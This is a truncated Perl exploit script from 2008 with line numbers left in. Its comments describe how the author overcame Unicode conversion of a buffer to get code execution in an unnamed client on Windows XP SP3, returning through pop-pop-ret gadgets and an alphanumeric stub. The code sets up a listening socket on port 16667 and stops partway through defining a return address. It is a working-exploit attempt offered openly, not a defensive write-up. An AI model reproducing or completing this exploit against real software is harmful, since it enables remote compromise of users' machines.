2 # k‘sOSe − 08/24/2008
4 # This is a useless and not portable exploit code, tested only on my winxp−sp3 VM.
5 # I was looking for a vuln to write an exploit for when I found this PoC:
7 # http://www.milw0rm.com/exploits/5817
9 # The author wrote:
"The reason why there isnt any shellcode here is because the client is
coverting the junk/buffer data to unicode so its corrupting the shellcode,
ive tried sending unicode buffer but the same problem occurs.
if anyone else can get further please let me know. but i doubt you can"
15 # It is for this reason, a small suggestion of impossibility(copyright Phantasmal Phantasmagoria)
16 # that i decided to write this. Actually it was pretty funny :)
18 # The first problem is how to redirect the execution flow to our buffer, the buffer can be found
19 # at three different locations:
20 # − at some address on the stack converted to unicode
21 # − at some address on the heap again converted to unicode
22 # − at some address on the heap in plain ASCII
24 # Unfortunately none of these addresses are unicode friendly :(.
25 # But.. there is an address on the stack that points in the middle of the buffer(the one on the
26 # stack), all we need is to pop the stack 6 times and then return.
27 # To achieve this we return 2 times on a unicode friendly pop,pop,pop,ret.
29 # The second problem is that the buffer on the stack is converted to unicode(so \x41 −> \x00\x41)
30 # *and* must be, with some exceptions, in the \x01 −> \x59 space... so I decided to write a
31 # unicode friendly ASM stub that will load the address of the ASCII version of the buffer in EAX
32 # using offsets from a register(somewhat related to our buffer), push it and then return.
34 # On my box this works 100 times out of 100 :)
36 use warnings;
37 use strict;
38 use IO::Socket;
40 my $sock = IO::Socket::INET−>new( Proto => ’tcp’, LocalPort => ’16667’, Listen => SOMAXCONN, Reuse => 1 );
42 my $ret
"\xa2\x41" ; # pop, p